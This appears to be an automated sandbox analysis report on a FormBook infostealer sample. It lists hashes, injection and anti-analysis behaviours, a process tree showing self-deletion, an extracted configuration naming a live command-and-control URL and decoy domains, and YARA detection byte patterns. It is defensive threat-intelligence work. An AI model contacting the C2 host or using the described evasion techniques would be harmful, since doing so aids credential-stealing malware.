Play interactive tour

Edit tour

Windows Analysis Report wREFu91LXZ.exe

Overview

General Information

Sample Name:	wREFu91LXZ.exe
Analysis ID:	452405
MD5:	686dc98567009e47eac88e95804b9dde
SHA1:	5788c30289d12f69d5cf323049d8d3c3a3e73cda
SHA256:	11d84c7f9c579c2e58f4acc04d488d5f1c6cc0439609099eabec42444f5ef952
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wREFu91LXZ.exe (PID: 5912 cmdline: 'C:\Users\user\Desktop\wREFu91LXZ.exe' MD5: 686DC98567009E47EAC88E95804B9DDE)

wREFu91LXZ.exe (PID: 492 cmdline: 'C:\Users\user\Desktop\wREFu91LXZ.exe' MD5: 686DC98567009E47EAC88E95804B9DDE)

explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msiexec.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cmd.exe (PID: 6084 cmdline: /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x66c9:$sqlite3step: 68 34 1C 7B E1 0x67dc:$sqlite3step: 68 34 1C 7B E1 0x66f8:$sqlite3text: 68 38 2A 90 C5 0x681d:$sqlite3text: 68 38 2A 90 C5 0x670b:$sqlite3blob: 68 53 D8 7F 8C 0x6833:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.1.wREFu91LXZ.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.wREFu91LXZ.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.wREFu91LXZ.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
1.2.wREFu91LXZ.exe.21a0000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.wREFu91LXZ.exe.21a0000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.wREFu91LXZ.exe.21a0000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.2.wREFu91LXZ.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.wREFu91LXZ.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.wREFu91LXZ.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.1.wREFu91LXZ.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.wREFu91LXZ.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.wREFu91LXZ.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.2.wREFu91LXZ.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.wREFu91LXZ.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.wREFu91LXZ.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: wREFu91LXZ.exe	Virustotal: Detection: 31%			Perma Link
Source: wREFu91LXZ.exe	ReversingLabs: Detection: 53%

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
